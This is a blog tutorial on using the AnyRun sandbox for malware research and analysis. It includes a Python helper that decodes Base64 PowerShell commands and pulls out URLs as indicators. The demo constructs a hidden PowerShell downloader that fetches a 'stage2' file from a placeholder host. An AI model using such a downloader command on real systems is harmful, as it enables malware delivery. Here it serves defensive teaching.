NATuts

How to use AnyRun for in-depth malware analysis

23 July 2021, in Software

AnyRun is a sandbox analysis service used to open suspicious files or visit websites and record the network and system activity of the application or website. A paid subscription unlocks more features, but for our purposes the free version is more than enough. In this article, I will share two different ways that I use this powerful tool.

In short, if you suspect an application may be malicious, run it on AnyRun: the analysis is shown as it progresses, and you will learn which Windows components the application affects.


Research malicious code on AnyRun

The first way to use AnyRun is to research malicious code using the results of other people’s previous submissions. In the free version, all submissions are public. This makes AnyRun a very valuable tool for Open Source Intelligence (OSINT). We use these public results to identify malware, extract Indicators of Compromise (IOCs) and Behaviors of Compromise (BOCs), and to identify threat trends. From the home page, click on the dog-ear-like icon to view the public submissions. This list is updated in real time as people submit samples for analysis. Use the filter icon to the right of the search bar to narrow your search.


For example, if I see a suspicious domain while monitoring or searching, I can use the filter above to look for existing public submissions that involve it. Or if you are interested in a specific malware family such as Ursnif, you can find it by entering its name in the fields above.

Analyze malware with AnyRun

The second way to use AnyRun is to run your own analysis. If you cannot find existing submissions, you can submit a URL or file for analysis. After you create your free account, click New Task. Basic mode lets you choose the operating system and then provide a URL or upload a file for analysis. An advanced screen is available if you want to adjust options such as auto-acknowledge UAC, anti-evasion, browser type, and the use of FakeNet or Tor. Grayed-out options require an AnyRun subscription.


Once everything is set up, click Run. You can then watch the malware execute, or the URL you provided being visited, in real time.

The session will end by displaying the results of the analysis. URLs listed in the browser bar can be saved as reference or shared with others.

It’s important to note that in the free version, all tasks are public, which means everyone else can see the results. So do not run any malware or visit any websites that you think are targeting your organization or may reveal sensitive information. You also need to be careful about two things: session timeouts and user-requested actions.

Session timeout

By default, AnyRun only runs the virtual machine for 60 seconds. While the analysis is running, you can press Add 60s in the top right box to add 60 seconds. You only get a few time extensions with the free version. This matters because sometimes a download takes a long time, or the malware author delays execution to evade automated sandbox analysis. Another reason you might want more time is that you need to perform user actions.

User-requested actions

Sometimes the malware or website you are trying to analyze will ask you to take some action. Your mouse and keyboard can be used in the virtual machine. For example, an unzipped file might have several files inside, and you’ll need to choose which one to run. Or a credential scam site may ask for your information to proceed. Be aware of these types of actions and be ready to extend the session time if needed.

Analysis results

Regardless of whether you’ve found existing studies or created your own research sample, you’ll have a wealth of information once you’ve done your analysis.

Information


  • Sample source: the environment in which the file or URL was run, and the threats detected.
  • IOC: lists all relevant captured IOCs.
  • Sample download option.
  • Process graph to show parent-child relationships of observed processes. In this screen, you can click on any item to get more information about it.
  • The ATT&CK matrix displays the techniques observed in the sample.

Process


  • The related processes are listed by the full command line as parent processes and nested child processes. The icons displayed in the process ID show behaviors such as network information, executables launched, etc.
  • Clicking on any of these brings up the details window at the bottom with additional information, warnings, and hazards.
  • The “More Info” advanced details screen shows the full command line, as well as the system-level actions of this process, such as modified files, registry changes, network traffic, and more. For example, clicking on the PowerShell process and then clicking “More Info” will bring up the Base64-encoded command.
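The Base64 string shown for a PowerShell process is the script passed to -EncodedCommand, encoded as UTF-16LE. The following is an added example (not from the original article or from AnyRun) that decodes such a command line copied from the “More Info” screen and pulls any URLs out of the decoded script as candidate IOCs; the sample command lines are constructed for the demo.

```python
import base64
import re
from typing import List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_FULL_FLAG = "encodedcommand"
# Simple URL matcher for harvesting network IOCs from the decoded script.
_URL_RE = re.compile(r"https?://[^\s'\"\)\];]+", re.I)

# Constructed sample: a command line as it would appear in the process details.
# The payload decodes to "Write-Host hi" (UTF-16LE, then Base64).
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -W Hidden -EncodedCommand "
    "VwByAGkAdABlAC0ASABvAHMAdAAgAGgAaQA="
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if the flag is absent."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        # Match -e, -enc, -EncodedCommand, etc., but not -ep/-ex (ExecutionPolicy).
        if flag.startswith("e") and _FULL_FLAG.startswith(flag):
            b64 = tokens[i + 1].strip("'\"")
            # Tolerate stripped padding, which copy/paste from a report often loses.
            raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
            return raw.decode("utf-16-le")
    return None


def extract_urls(script: str) -> List[str]:
    """Collect unique URLs from a decoded script as candidate network IOCs."""
    return sorted(set(_URL_RE.findall(script)))


def build_sample_cmdline(script: str) -> str:
    """Constructed helper for the demo: wrap a script the way a launcher would."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoP -W Hidden -enc {b64}"


if __name__ == "__main__":
    script = decode_encoded_command(SAMPLE_CMDLINE)
    print("decoded:", script)
    downloader = build_sample_cmdline(
        "Invoke-WebRequest -Uri 'http://example.invalid/stage2.txt' -OutFile $env:TEMP\\s.txt"
    )
    print("urls:", extract_urls(decode_encoded_command(downloader)))
```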

Network


  • HTTP Requests will show HTTP results, calling process, full URL, document type, and more. Clicking on one of the items displays the information, Exchangeable Image File (EXIF), Hex data, as well as a link to download the resulting data.
  • Connections shows connection by protocol, calling process, Domain/IP/ASN information, port and traffic. Clicking on one of the entries will show a Hex dump of the packet data in the network session. Here we can see things like HTTP request and response headers as well as payload data.
  • DNS Requests shows each query and its response.
  • Threats will have alerts triggered from a Suricata IDS instance with associated alert details.
  • The PCAP icon on the far right allows you to download a packet capture of the sample.

Files


  • Modified files shows the process, full path, filename, and file type of any file created or modified.
  • Clicking on any of these will bring up the details of the file including its hash, MIME, asset preview, and even the option to download a copy.

Conclusion

I use this tool daily for threat analysis and research to help build a threat-hunting community and awareness of ever-changing threats. Finally, AnyRun has a fairly intuitive interface, and I hope I’ve covered enough of its extremely useful features to encourage you to give it a try.
